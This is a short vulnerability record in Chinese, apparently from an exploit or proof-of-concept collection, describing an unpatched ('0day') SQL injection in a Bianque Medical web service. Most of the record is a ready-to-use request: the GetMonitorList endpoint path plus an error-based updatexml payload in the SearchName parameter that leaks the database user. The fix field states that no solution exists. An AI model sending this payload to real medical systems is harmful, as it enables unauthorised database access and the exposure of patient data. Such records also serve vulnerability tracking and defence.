vendor = "扁鹊医疗"
name = "扁鹊医疗GetMonitorList sql注入"
type = "SQL注入"
version = "未知"
path = "/AppService/BQMedical/WebServiceForFirstaidApp.asmx/GetMonitorList"
detail = "/AppService/BQMedical/WebServiceForFirstaidApp.asmx/GetMonitorList?UserID=1&OperatorID=1&SearchName=string%27%26%26+updatexml(1,CONCAT_WS(1,1,current_user),1)+%26%26%27"
fix = "暂无解决方案"
date = "0707"
label = "0day"
verifier = "匿名"
